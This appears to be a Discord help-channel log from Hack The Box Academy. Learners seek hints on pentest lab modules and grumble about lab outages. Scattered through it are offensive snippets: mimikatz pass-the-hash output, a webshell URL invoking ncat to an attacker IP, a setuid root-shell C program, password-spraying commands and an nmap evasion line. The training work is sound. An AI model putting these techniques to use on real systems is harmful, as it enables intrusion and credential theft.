#modules

Hey guys still stuck on the AD Skill assessment 1 last question. I can figure out how to connect to the DC. I tried to use mimikatz on MS01 to pass the hash to DC01 but it always opens me a cmd on 172.16.6.50 (MS01) instead of the DC01..
||

user    : Administrator
domain  : INLANEFREIGHT
program : cmd.exe
impers. : no
NTLM    : admin-hash
  |  PID  1328
  |  TID  6344
  |  LSA Process was already R/W
  |  LUID 0 ; 1291344 (00000000:0013b450)
  \_ msv1_0   - data copy @ 00000170E2E41D40 : OK !
  \_ kerberos - data copy @ 00000170E3310E48
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 00000170E3229CB8 (32) -> null

mimikatz #
``` ||

Linux PrivESC | Privileged Groups
found the flag, not working

what is wrong with this module

or with me

or with us

incorrect

the thing with HTB is that they deliver top notch content so that even a slight up or down is noticed

went to the special location of my group, greped the flag, got the flag || was in http get parameter ||

Going through module/136/section/1289 File Upload Attacks (white list filters). Changing the file extension in burp and forwarding it trhough repeater leads to php code displayed in HTML(view source) but not on the web page(?). Wondering what I'm doing wrong. Any help is appreciated. TIA

does the file extension allow code execution?

😉

Hi, curious to know if the injection is indeed in the ||ping|| function, and not ||whoami|| or other. The ||ping json.parse|| doesn't let me inject anything :(, is it there anyway ? @tidal kelp @pine dagger

How can you determine this?>

Yes, it is the p*** function

thanks, got it ! 🙂

Password Attacks
PtT Linux

i see there are 2 ccache files in /tmp/ that belongs to julio
i tried export KRB5CCNAME=/tmp/those2ccachefiles
smbclient //DC01/julio -k -c ls -no-pass

but im getting either the message:
NT_STATUS_ACCESS_DENIED
or
NEG_TOKEN_INIT

what am i missing here ?

nvm, the ccache file expired, thats why i could not use smb...

btw dont need any hash

How do I count all the objects ?

Carefully

please dont say count them on fingers

I am bad at math

I mean I see a count of objects in your screenshot

its not 564 or 9 nor 564+9

But there's likely a custom query or w/e

the count does not change no matter which rule I pick the task was kerberoastable accounts and there is a preset rule which i am using in the picture

I see at least 13 in that picture

there maybe more of them off screen

where can I find the number given to me

which module is that ?

wow the Password Attack Module is huge, takes a lot of time, all those reading makes me tired

I am in the active directory enumeration module credential enumeration -windows section

😄

any idea why this is not working?

try without ;

@sterile epoch

it worked thanks I thought it was part of it

nah it closes the variable

can someone please reset Devvortex on app.hackthebox

I have no access to this channel

Writing directly to the template can screw the whole dashboard

strange

spoiler btw

removed

read and follow #welcome

Ok I will thank you👍

go

Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.
I am stuck please help

which module?

ad enumeration cred enum with windows

I cannot figure out the math of the oid

what makes it admin

what value is disabled

first craft an ldap query for disabled accounts that are people; second grab the name and description fields

yes how do I do the crafting

the you don't need to do OID math for disabled account (2)

you can also just do two OID strings for it

so you really don't need to do math

yes but what oid how do I know what value must be in the oid

is there any video for crafting these queries

fafo

it's what i did to understand it

whats that?

literally just fuck around with it

ouu

ldap isn't that difficult once you get it down

and each of the OID queries is explained underneath for the type of search you wanna do

Active directory ENUMERATION and ATTACKS :> should be interesting

hola1

hi, i new on it, and i finished Introduction To Academy. won the first 70 cubes, then i dont buy another course. anynone has an idea whats going on??

Introduction to the academy is quite a trip, I would NOT recommend the getting started module until you have the basics covered

Yeah but i finished

you have 70 cubes, use the 50 that you have and invest them into https://academy.hackthebox.com/paths the Operating systems path first

But it bug

on the local file inclusion skills assessment, im trying to get my cookie for the site (at index.php) and it just wont show up. how am i meant to ||poison the server logs without one||?

Dont allow me to buy

Any course

regardless of the price

if theres a bug you should contact support someone else might be able to pitch in

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Thanks bro

anyone else struggling with active directory enumeration and attack windows boxes are painfully slow

Hi there, does anyone have a hint for the 'Authentication Bypass - Type Juggling' exercise? From the source code, it appears that the password input is hashed before being subjected to a loose comparison. To me, this seems like a magic hashes attack. I've tried all examples of magic hashes for SHA-256 but with no luck. Am I missing something?

Does anyone know how to get the Notes.zip file in the password attacks module, protected archives? The machine says its in /root but i am logged in as root and cant find it there even with ls -la

i could have sworn it was under ||kira||

wth is wrong with linux PrivEsc module

lxd section, rooted the target, not flag

ok np i just failed my arch linux ancestors

Active Directory Enumeration and Attacks > Initial Enumeration of the Domain > Identifying Hosts

Currently walking through the example regarding finding IPs and hostnames with Wireshark and tcpdump, I have no trouble finding the IPs with ARP filtering, but neither tool seems to show any traffic for MDNS (as in the example).

There are two interfaces on the given machine, ens192 and ens224, but ens224 seems to handle outside connections (very small amount of traffic, mostly ssh), ens192 is the one used in examples also.

sudo tcpdump -i ens192
sudo tcpdump -i ens192 -B 4096 -n

The above commands give a large number of netbios traffic, but no MDNS as would be expected by the example gif (posted below).
The wireshark output matches the tcpdump output, both missing the MDNS entries.

# My output
<SNIP>
04:15:18.600600 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:18.630190 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:18.630919 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:18.631072 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:19.177112 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:19.208413 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:19.364723 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:19.366711 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:19.395952 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:19.396341 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:19.506278 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:19.537626 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:19.719648 ARP, Request who-has 172.16.5.1 tell inlanefreight.local, length 46
04:15:19.942680 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:20.130315 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:20.130367 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:20.161556 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:20.255326 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:20.286936 IP 172.16.5.130.netbios-ns > 172.16.5.255.netbios-ns: UDP, length 50
04:15:20.532588 ARP, Request who-has 172.16.5.1 tell inlanefreight.local, length 46
<SNIP>

example from module ^
Is there something I'm missing in my commands, or another way I could get the MDNS traffic to show up in wireshark and tcpdump?

It seems responder picks up the MDNS requests, so they are being sent/received

why is my bloodhound stuck like this

In the Pivot Tunneling module Section RDP and SOCKS Tunneling with SocksOverRDP Could someone explain what is the objective of the section? I am confused what we are trying to achieve here?

I got it partially that we are have foothold on 10.10.x.x and we are trying to access 6.155 through 5.19

INTRODUCTION TO DIGITAL FORENSICS - Skills Assessment

Using VAD analysis, pinpoint the suspicious process and enter its name as your answer. Answer format: _.exe

anyone have idea with this? I am not sure what is VAD

https://forum.hackthebox.com/t/attacking-enterprise-networks-double-pivot-using-chisel/267043

On Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux section, how do I log in for this question:

I already have the username and password

I'm currently in an SSH session with the credentials provided at the beggining of the questions.

SSH did not work for the credentials I found in question 2 for the user found in question 1.

Tried to rdp in and got this

why are you trying to rdp into the bastion host with the found credentials

In the question is mentioned where you need to use them

Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

I need some help doing this

please help I cannot craft ldap query

I already tried ssh, it didn't work

dsquery.exe * -Filter "(&(objectClass=user)(memberOf=CN=Administrators,CN=ACADEMY-EA-MS01,DC=INLANEFREIGHT,DC=LOCAL)(userAccountControl:1.2.840.113556.1.4.803:=2))"
This is what I am doing

Okay, I think I see what you're saying. I added /d: with the domain in my xfreerdp command and it did the same thing

This is the error I get

Is there another way to log in besides these?

I know the password and username are correct, they worked as answers in the module

you're logging in to the wrong host

xfreerdp /v:172.16.5.225 /d:ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL /u:<username> /p:'<password>' /dynamic-resolution

I added the domain the second time I tried. Still no luck.

The question asked me to log in to the domain controller. Should I be trying something else?

This seems like it should be straightforward, I already have credentials

Should I be logging in to FREIGHTLOGISTICS.LOCAL?

I'm trying ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL

find the target you're supposed to connect to and its ip

I thought it was the IP they gave me in the lab.

What other IP would I be going for?

The one when I do ifconfig

This one

That's what I'm using

I've been struggling hard with this.

check /etc/hosts on the victim machine, it shows the ips for the respective hosts

use the ip for the host it names in the question

Ah, I see it thanks! I'll try with that.

I've seen /etc/hosts in another module but it wasn't covered in AD so I didn't think to use it.

Still not working

can i see the command? dm if you're worried about spoilers

Okay, will DM, thanks

I tried the command from both my attack machine and the attack host.

Neither worked

Is the ip I DMed you the right ip?

I got it from /etc/hosts

if it's the IP you're using here, it's wrong

.238 is the one they're using

i haven't quite got up to that part yet, just trying to test some things first. give me a moment

Yeah, I used .238

Thank you.

does the host even have RDP open btw? that part's not in my notes

rdp is the last thing I'd go for tbh, not every host has it enabled

yeah, I only use RDP as a last resort and it's not what I used here so I was wondering

I tried SSH and that's not working

connection refused

same question, is SSH even enabled?

you seem to just be throwing random things at it

Looks to not be, SSH is showing connection refused. What else would I log in with besides SSH and RDP. The question just said to log in.

just making sure, you're doing your commands from the victim machine (the one you did the ifconfig on)?

what other ways are there to remotely log in to a host?

ive managed it with ||psexec||, im just reading through the module now to see if it mentioned it or another way

Yes, I realized with that IP that's the only path to it unless I tunnel from my attack machine

I'm confused.

How would that tool work?

was hoping they'd reach that on their own, but it's also what I used

hello what command yall used to get initial foodhold on Wndows PrivEsc Skill assessment 1? I can exploit command injection vulnerability but my reverse shell one liners dont seem to work, and I cant download reverseshell.exe with certutil for some reason 😮

Yeah, there's no way I would have reached that on my own.

really? it's been mentioned multiple times in the module

I probably did tunnel, it's not in my notes, I just always work from my attacking machine

attacking common services - easy lab
i got the username password uploaded a webshell but i can't do a reverse bind shell
can anybody take a look?
http://10.129.203.7/webshell.php?c=ncat -nv 10.10.14.109 4444
and my console is running
nc -nlvp 4444

have a read over the impacket stuff in the 'Credentialed Enumeration - from Linux'

yeah mb, prob should have hinted a bit more

Just didn't come to mind, normally once you get creds I'm used to the questions being RDP or SSH

Thank you for the info and the help!

No I appreciate it, I hate spinning my wheels trying to find an answer. Got it with the tool you mentioned

Syntax worked first try so at least I know what I'm doing once I find the right tool

mysql don't have a shell
i also searched on youtube some people said that it is normal for the flag to be in C:/Users/Administrator/Desktop/flag.txt
i load the file and i found it, but i cant seem to get the reverse shell
i also pinged to my attacker ip it has connection so i don't get it

yea i already uploaded the web shell but my reverse bind shell dont work

whats double backslash

for my ncat?

can i dm you?

anyone suffering from target spawning issue again ?

damn , don't tell me the infra is down again

I can't start Instansces

vpn is dead too

WTF

i was on ssh but its just stuck

my rdp get killed

does anybody know what command to use to get foothold on Windows Privilege Escalation Skill Assessment 1?

I can exploit command injection vulnerability and get code execution but idk how to get reverse shell.
I cant use CertUtil to download reverseshell.exe on target for some reason.
And my nc.exe one liners and similar dont seem to work.
Does anybody know

Hello guys I need some help, with the web exploit module exercise

you'll find more people might want to help if you ask your question to start with

https://dontasktoask.com/

what do you need help with?

Okay thanks

First thing: What is the service here ? http or Apache httpd 2.4.41 ?

(this is my scan result)
PORT STATE SERVICE VERSION
50926/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Getting Started – Just another WordPress site
|_http-generator: WordPress 5.6.1
|_http-server-header: Apache/2.4.41 (Ubuntu)

technically http, but the person who wrote the question might've meant something else

use powershell revshell

what was the exact module name?

ill just pull it up

Public Exploits (from Getting Started)

does target spawning work

It's really slow, mine took 15 minutes to spawn

mine not work too

my VPN also has some problem

Can't actually connect to it though...

my support 😦

Who $ sudo ddos HeckTheBox-Academy

lol

now it seems like entire site is down

nvm

site works for me but no vpn

Hey guys, I can not start the instance

chats a bit busy marcel, dm me if you want

Okay

hey guys, I meet this problem : There are no available instances. Please try again later.

Yeah seems like we all have that problem

what should we do ?

https://tenor.com/view/kyriostsahs-lonely-waiting-quarantine-life-gif-18073672

its back up for me

Go to Trh*** and continue to do other shitty exercise

But their quality is awful

In Academy?

In Academy, when I start instance, I get this problem:There are no available instances. Please try again later

dude, read the replies you get

But, Anything displays normal

#modules message

Oh, I thought the two of us were an example

Thanks

tbf 70% free is better than nothing

Depends on which modules… I have seen the nmap module from them, and felt so awful compare to HTB one

as a broke person i cant complain

If you scroll up you can see we all are having that issue

Anyone is doing bleichenbacher attack under tls attack module? I think I have the correct command but was not able to retrieve pre master key before the instance timeout… any hints please

literally me rn

you and me

On my last section of this module, feels like forever

same my instance is down too

Pray for the server

🙏🏼

🙏🏼

I was re-reading the AD modules, then booom the servers are down

Someone pwned it and took down the machine

Someone take down htb and make us suffer

VPN doesn't work =/

https://tenor.com/view/mondays-work-bad-mood-hate-mondays-gif-14705230

Hi

Do we get certificate of completion or badge after completing a module ?

I am intersted in this one.

yes we do

https://academy.hackthebox.com/course/preview/adcs-attacks

Are modules like Pro-lab or there is supporting material given like a normal course ?

And after unlocking a module if I unsubscribe will have access to that module ?

Modules are just courses with labs

are the labs down?

@indigo rock Can you please help me here ?

if you unlock module with cubes then it yours forever
if you unlock module with subscription(student/silver/gold) then you need to finish it

15 min ago aprox but I don't know now I was able to connect to web socket xss in modern web expl techniques

https://tenor.com/view/army-salute-soldier-gif-5277339671624187647

Same for me, VPN and labs down

I will use this

no don't use that, get money subs if you want cubes

that's a bad choice

Why ?

I would buy silver annual or gold annual you get discord assistance in case stuck though student is also worthy in case you are one

Hi everyone, can I get a nudge for the exercise please

I'm one section to reach there in that module dm me when I'll get home I'll check that exercise

use student subscription , if u r not student then go for silver/gold monthly

Ty!

Thanks, I just need to get hands on PKI stuff will go for monthly subscription

Are lab shared or private subnet/VPC ?

private instances

nice

the best thing , no one will spoil on you pr destroy the lab

I tried pro-lab, it was very bad experince becuase of limited time I get & shared infra, in the end I left that

limited time? you get a whole month to do it

Not that, I meant with the job and other things in life, I get like 2-3 hours only

targets aren't spawing are the labs down?

yeees

any ETA

they are up. Working fine now

their up but can you interact with it?

not for me

this holds tru unable to interact

VPN's not connecting

guess we gotta wait

Patience is a virtue

Noob help : Did you sudo ?

They are root

👌🏻

back again

UP

welp

Friendly reminder to keep that streak going 😂

Well looks like that might be a problem lol

Everyone having connection issues

Yeah, came here wondering if others were having connection problems.

Yeah same. Having connection issues.

Please tell us more that there's issues going on

academy students rn

https://tenor.com/view/hang-on-gif-27524073

I'm gonna go check it out. Wish me luck 😂 I'll see if pwnbox works.

(Im)patiently waiting

I'm patiently waiting too /s

Pwnbox likely won't if the issues are with vpn servers

My streak tho 😢

Pwnbox still uses the vpn to connect to the labs

I'm jp it's all good

Yeah I understand. I haven't felt the issue personally quite yet. Just now waking up and getting ready to sign on.

Yeah rip 😂. Still not up.

I'll just CTF in my head

Hello everyone! new user here. I was hoping for some advice on what modules to follow for penetration testing with a focus on ics/cloud l. Any advice/help would be greatly appreciated thanks in advance.

bruh

just let me finish this

👍

I don't think there's anything regarding ICS or cloud on Academy tbh

there is on altered security dot com

but only cloud , no ics

azure

Hahaha congrats on getting so far. I wish you luck on your test when you can take it soon!

Teaching about hacking ICS can be a bit dangerous, no? Don't see an ethical and practical use for the general population.

[ ! ] Alert

Alright guys, you can spawn again! It's back up!

Thank you so much. I’m currently an ics engineer so I was seeking of pursuing something in that realm being that I know how things operate via ics

Congrats I think you will manage to be a CPTS certified, redo attacking enterprise networks and i recommend zephyr and offshore before the exam

I've only heard of SANS offering an ICS pentesting course, maybe someone else knows other resources, but that's just very niche

Thank you so much I’ll definitely take a look into it

scadahacker dot com 750$

Hey guys, does anyone has problem with spawning target machines in modules? Endless spawning process

no

try force refresh + delete browser cache

me

try clean browser cache and cookies and then ctrl shift R to force refresh webpage

and ctrl + F5

It should be fixed by now. Try reloading.

I have too

try to switch the vpn server

still not work

idk i switched the server and its work now, be sure its [eu-academy-1] server

hello how come these modules aren't working and the boxes are lagging?

i can't get anything done

either it stays at spinning the box up indefinitely, or when/if it finally manages to boot up it lags and randomly d/c and nmap dont work. it's not my connection either.

yes me

this is a subscription service

and the service is down? do we get our subscriptions modified to include an extra day to compensate for this problem? how does that work?

Hi everyone, I'm asking for help with the credential hunting module in Linux, with kira as the username I'm trying with hydra and using the mutate password created previously but I don't have any results
I'm trying on ssh and ftp

it still dont work. when i try pwnbox it says "Error there are no available instances"

it seems like i am not the only one experiencing this problem

no? I've never heard of anyone offering extra subscription days because of issues like that, you get time back if you're in the middle of an exam when it happens

it's a platform wide issue currently

yes and they have service interruptions for a subscription service? u never heard of that before?

time is money

have u heard that before?

giving extra subscription days? nope, haven't heard of that, most of the time issues like that are out of their control and caused by service providers

they are the service provider

bro just switch the server

it ends there for me, as a customer. idc about their infra that's on their engineers right?

i try it and its work now

asking an extension for a couple hours of downtime is pretty funny lmao

they don't really host their own servers afaik

why should i be sympathetic to w faulty product that is happy to take my money but delivers substandard?

it's been broken since last night

then just cancel your sub

24 hr is not ok

its been broken all month

that's definitely a lie, but you do you

i won my sub in a CTF

A lot of times, when I can't start an instance, I figured out it's usally on my end. Couple things that might surprise you helps:
1.) Disconnect your openvpn before starting the instance
2.) Restart your computer
3.) Make sure you didn't live 'Intercept Proxy' on when you close BurpSuite
4.) Restart your browser

they keep migrateing resources between labs and academy need to upgrade theyre infrastructure the userbase has out grown it

so no one actually took your money but you're still whining about it?

so it's literately free, calm down buddy

im not bashing its a good service

it's my time

i can complain about a trash ass product too?

that was not to you btw, just ended up being after your message

it is what is is which is broken and laden with a community of unpaid apologists

A few days in the grand scheme of a year isn't much

time is money.

¯_(ツ)_/¯

you sure are spending a lot of time and money complaining here

I also experienced some vpn connection issues a while back; what did I do? Stepped away and came back later

yeah i guess i should just read the leaked test and answers instead of putting in the work waiting for faulty boxes to never spin up or randomly die

the other thing one can do is contact support, this chat isn't monitored by staff

shit happens. ¯_(ツ)_/¯

This. And support isn't on the discord

I think HTB staff did not expect this happened, they are not accidentally to make it not work

No. Because I value learning lol, you're bringing in a non-sequitor

then go ahead and do that 🤷

Could I? Yes, but I wouldn't learn anything

support ahasnt been any real help but im sure theyll figure it out until then move on to something else

You do realize that's why the report is a huge portion of the exam yeah?

to what?

They can easily tell by a report format you either copy/pasted or have 0 idea what you're actually doing

To be fair to them, if 100+ users are all complaining to them about the same issues, they can't get to everyone in a timely manner

im not bashing just fell the pain

it happens ¯_(ツ)_/¯

People still cheat on oscp

Lol

?

for the active directory tunnel they crippled on purpose

to make chisel not work

"Crippled on purpose"

What are you talking about dude

TrY haRDeR

on the oscp exam

are u not an oscp?

You're on like 3 different topics right now

i want to be a certified penetration tester from hack the box

but the academy prerequisite is broken

Ok? And the exam will still be there

the modules are down

how's that cheating? a public forum post? 🤔

The servers themselves are having issues. And it seems some users are able to get in and work

able now using Europe one

because u aren't supposed to ask for help

get a refund go to tryhack me or something else

my biggest advice for rdp stuff is using the tcp download ¯_(ツ)_/¯

i finished all the content on tryhackme already

Who said you aren't supposed to? Unless you mean the exam itself?

Then yeah. But like, in terms of modules - this channel wouldn't exist if you're not allowed to ask for help

well it looks like they're publicly admitting they asked someone for help while in the OSCP exam

Quit yapping dude

u dont run me

u have no 0day please have some more respect

Correct, but I can have the opinion you're being annoying

Ok and?

That literally has 0 bearing on anything

only people with nukes get to dictate geopolitical policy

Respect is earned. Not demanded

tell that to north korea

well first of all you don't know, Marcie could have 5 zero-days, second of all, go cry somewhere else

Anyway, we're straying far off-topic

Hope your vpn/connection issues get fixed soon and you can stop whining

¯_(ツ)_/¯

i hack stuff

hbu?

I just hang out and push buttons

did somebody figured out how to fix endless spawning?

I get the feeling you're trying to talk down to me bc my rank lol which is hilarious ¯_(ツ)_/¯

no i'm not

You might need to message support if it's stuck on the backend

Alongside that, changing vpn regions tends to make it work

I also have the option they are annoying. You hack stuff, but do you contribute anything useful? Make a proper write up on your 0day and bring change to the world of you really have one.

yes i have created CTF and puzzles/games for my friends

change to Europe one... I think the backend in other country might down right now

thanks

also i have given to the community oscp training + labs prize

Now if you'll excuse me, my enumeration script has completed.

Well that is very nice. But don't be mean to the community.

Positive vibes homie.

i was told to quit yapping about a service disruption

Sorry my only value is if I have a 0day sorry

post your academy progress

I was telling you to quit yapping about nonsense

Nah I'm good lol

let's all qualify ourselves as adept academy students

my uncle is the president of offsec

I understand. We can all chill and get along though. What's important is working towards understanding security more in depth to improve the security of our technology and keep innocents safe from hackers.

My progress has been halted due to life circumstances

¯_(ツ)_/¯

my progress has been halted due to HTB circumstances

Cool, congrats

If you do not have a database of findings, you'll waste a tremendous amount of time rewriting the same content repeatedly, and you risk introducing inconsistencies in your recommendations and how thoroughly or clearly you describe the finding itself. from the reporting module.
Is there any publicly available database of such findings? The recommended tools after this paragraph can store findings for you to use in the future, but is there any known database already populated with findings? It would be very helpful

It's not a pissing contest bro, it's important that everyone is even on the platform attempting to learn in the first place. That alone is much more than the general population attempts to do.

Its stating for you to create a dB of your findings

means when you run into one, write it yourself and save it, then when you run into similar findings, you can pull it up easily

Mans made a whole gif to compare dick sizes

You have 1 thing bookmarked bro...

https://github.com/juliocesarfort/public-pentesting-reports

It's funnier bc I've had several people attribute their cpts passing in part to my help during their time fucking around in modules

on my last engagement we used dradis to report our findings

https://tenor.com/view/disappointed-so-gif-18681605

nobody helped me with modules but i do have some awards and accolades on the htb forums for helping others

last i checked only a handful of people had the badge for being that helpful

guys trying really hard to be cool

it's almost working

Yeah I got it. Just wondered if there any available resource already, could save some time since I have only two modules to go till the CPTS end, and I won't be able to document many findings

¯_(ツ)_/¯

Any vulnerability/vector would be a finding btw

You'd need to tailor it to your situation

What?

i got a free hoodie from htb for doing the ctf for a season 8-)

your company will probably have a system on how to write findings and maybe a list of exisiting ones so, for now just write it yourself

I just want to be able to fill the explanation about the vuln and some general details about it without thinking about phrasing and if it's elaborate enough

I.e. if multiple non-admin accounts have some inter-domain privileges, those would be a similar finding type -> improper rights delegation

Sure

if scream "hack the planeett" and i put on the free HTB hoodie i got from finishing in the top tier of last competitive season do u think the box will spawn?

Worth a shot

top tier? you're rank 200, relax buddy

Errr hi everyone

He got muted lol

Remember to keep the discussion on topic. and read #rules

Hi buffet

Howdy

Is this for me?

No

No

Been searching for a community for awhile

mods ruin the day again smh my head /s

Read #welcome to find out what the server is about

Okay

We are collaborators people! We work together and can make this world a better place.

No. Fuck you. ❤️

It appears I've missed some raw stupid.

Hi everyone, I'm asking for help with the *CREDENTIAL HUNTING IN LINUX module of CPTS, with kira as the username I'm trying with hydra and using the mutate password created previously but I don't have any results
I'm trying on ssh and ftp

Ftp should work, and you mutated with the given wordlist and rules list yeah? ~90K words

Is it normal for me to asked to visit hackthebox website on my laptop/computer?
I clicked #welcome and logged in and saw that specification

i may be wrong but i think ftp was on a non standard port and the wordlist was in said server

yes I used the changed password....90k words

Yes, in order to access more of the server you need to link your app.hackthebox.com account

Password attacks has you use a mutated list for 90% of it

Okay thanks

can somone that has done the skills assemsnt 2 for INTRODUCTION TO DESERIALIZATION ATTACKS give me a sanity check. I have done the first question and have admin but the form on the site seems to redirect to localhost and break. Is this correct?

i may be thinking of privsec

need help with this

Active Directory Skils Assessment 2

try with all the creds you have, if nothing works, dump more things

i dumped everything from SQL01

Hey guys, anyone completed bleichenbacher exercise under https/tls module? Stuck for couple of days

i think something is wrong with my target

i checked some online sources, im supposed to get a hash but somehow its missing

i will try tmw after restarting bye

Can someone tell me what are the prizes? 👀

q8 yeah? it's some credentials, probably not a hash tho

I'm on 10 and have nothing

They haven't announced yet

Oh I see. I hope they are free credits (cubes).

can someone help me with the intro to assembly code code skills assessments

explain where you're at and what you have tried

i used the dedup command in my SPL query and got the same result, 1 DistinctComputersAccessed. but 1 is the wrong answer

i used the dedup command in my SPL query and got the same result, 1 DistinctComputersAccessed. but 1 is the wrong answer

I think you replied to the wrong person my dude

Shii

Ah you just copy/pasted what the other dude said

Why though?

Idk

For what is this chabnel

Read the channel description

Cause that's a surefire way to get me to either block you or not help you in future

I only understand train

How many events were returned?

And I only understand ban

keep this channel relevant or face erasure

Ob wait

Your a mod

Nice

1

Can you try running this command:
||index="main" EventCode=4624 Account_Name=SYSTEM | dedup ComputerName||

hm last part of my SPL query was useless... i see. thxs dude.

hi guys,
I have a command line at hand. How can I further enhance it to enable scanning without being considered?

-> nmap -Pn --reason -f -n -p- --data-length 25

you can wrap code blocks in the backtick character ` for ease of reading

for example, like this

like what

I wrapped the content of my message in a code block.

sorry not understand

hello

`like this`

okey understand

but not understand output

I want suggestions as parameters

This channel is for questions about modules on HTB academy

find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes.

my query: index=main sourcetype="WinEventLog:Security" EventCode=4624
| stats count, range(_time) as time_range by Account_Name
| sort -count
| head 1

im getting: 'SYSTEM' as a result but its wrong.

you need to filter it down to those where time_range < 10m or 600s

noob moment ._. got it.

Hello people! I have stuck in Question 1 on Rapid Triage Examination and Analysis Tool from Introduction to Digital Forensics. I've been stuck for hours. I cannot understand how I can use zone.identifier to solve this question. Every little bit of help is valuable.

Hey y’all. Hope all is well. I am currently enrolled in the SOC Analyst path of HTB and I am stuck in 1 module. It’s the Stuxbot skills assessment part. I have tried all sorts of filters but no luck in finding the name starting with r? Anybody who can help me with this? Thanks in advance !

What module & section is this?

Introduction to Threat Hunting & Hunting with Elastic. I’m in the skills assessment section.

what event code have you tried using in your filter?

11

nice, and then they give you a path right? "C:\Users\Public", so why not just try a simple search event code and path

Cool, will try that. Thanks

Thanks for this! I got the answer!!

ABUSING HTTP MISCONFIGURATIONS : Advanced Cache Poisoning Techniques in both cases my payloads seem to be escaped have tried different URL parameters and different encoding schemes to try and bypass < > " from being escaped. Appreciate any assistance.

is there a way to get the targets fixed ? can't reach them at all even from the attack box like what is going on ??...... that happened yesterday too and i was thinking it's only because it was sunday and everyone was online but that's everyday ??

Terminate both > change vpn regions > restart both

i feel dumb now.... thanks that really helped 🤦

Currently on Linux priv Esc > Miscellaneous Techniques . For some reason I can't get it to work. I've created the binary, mounted the dir. But when I try to set the permissions it doesn't go through

Any ideas?

Is the shell file written in bash? Try adding the .sh extension and running it with ./shell.sh after adding permissions.

that worked for like 5 minutes now targets are just down again soo yeah....

Got the same permissions when adding .sh

Okay and what happens when you run it? Was it a bash script?

I'm greating the binary as per the module

#include <stdio.h> #include <sys/types.h> #include <unistd.h> int main(void) { setuid(0); setgid(0); system("/bin/bash"); }

Ah okay. You probably have to use gcc to compile it

did that aswell

so the steps I've done:

1. Create binary
2. gcc
3. mount dir
4. Setting permissions (error I guess)
5. Trying to run it

We're you able to compile the binary successfully? I understand though you may just have to mess with your mount command.

What permission error do you get? Have you tried giving it other permissions?

I got it actually

|| It wasn't about permissions at all, just need to look through all the exports ||

so my bad

even tho i hate windows, the PW attacks module is fun, tomorrow ima start with assassments

Use your hate to fuel your exploits

Currently on the Password Attacks Hard Lab and just want to check I'm on the right path. I've tried brute forcing the available services and I'm now trying again with winrm. It's been going for about 30 minutes, should it be taking this long or am I doing something stupid? Using the mutated_pass list from earlier. Any help would be amazingJust got it, after redoing my wordlist.

the citrix lab wont just start up

I reference you to this pinned message

thanks i've missed that 😄 i hope it will be fixed soon....

I may die waiting for targets to spawn, I'm gonna go and come back later :<

oh but that's 8 days old lol sure taking some time to sort things out 😄

take mine, they spawn it's just very hard to connect to them 😂

cant logon to splunk on interactive window

I'm guessing there's issues with spawning targets still?

yep

damn too bad I was excited to finish up the pivoting assessment

Try changing vpn region: seems like people on the eu servers are seeing some success

I am on eu-1 all good

Okay I'll give it a shot

Yup that did the trick appreciate it!

I having this issue:

Target is spawning...

yup same

As someone just recommended to me, try switching to the eu servers that worked for me

i been on eu and still not working

ah sorry my bad then maybe try switching to a different region until it works

Thanks! EU => DE is working

I'm on eu-1 and still have problems

target spawn but it's extremely slow

I'm talking about socks over RDP section

I will retry tomorrow 🙃

Well connection is gone and again target is spawning

Hello, I have a question regarding password spraying;
If we try sequentially a set of passwords against some set of usernames, is that considered a single password sparying attack or is it several password spraying attacks (one for each password)

this is bruteforcing

password spraying is try single password against user list

If you try a single password against a user list before testing the next password, this is not password spraying?

Password spraying can result in gaining access to systems and potentially gaining a foothold on a target network. The attack involves attempting to log into an exposed service using one common password and a longer list of usernames or email addresses.

one password and long user list

Password spraying is using one password against a list of usernames: if you're trying a list of usernames and a list of passwords its bruteforcing

So testing a small set of passwords like Welcome123, Password123 and InlaleFreight sequentially against a list of 100 usernames, that would be considered as 3 password spraying attacks?

(I'm a little bit confused because I found several definitions on the web)

Password spray is one against many

no this is bruteforcing

If you do them individually, then you're spraying individually

password spraying is one password at each time

But once you compile a list: it's a bruteforce

I believe hydra does have a mode that has it iterate through the username list first before iterating the password list

for example cme smb IP -u user.list -p "welcome2022"
then after cme finish it's job you run
cme smb IP -u user.list -p "welcome2023"

If you have a list of educated guesses, it's more of an educated bruteforce than random

@limber river so in your example, your performed 2 spraying attacks,

yeees

@limber river thanks for your answer.
That makes thing clearer.
My confusion came from the fact that some people automated the process you described, and describe it as a single password spraying attack

Sorry for my english

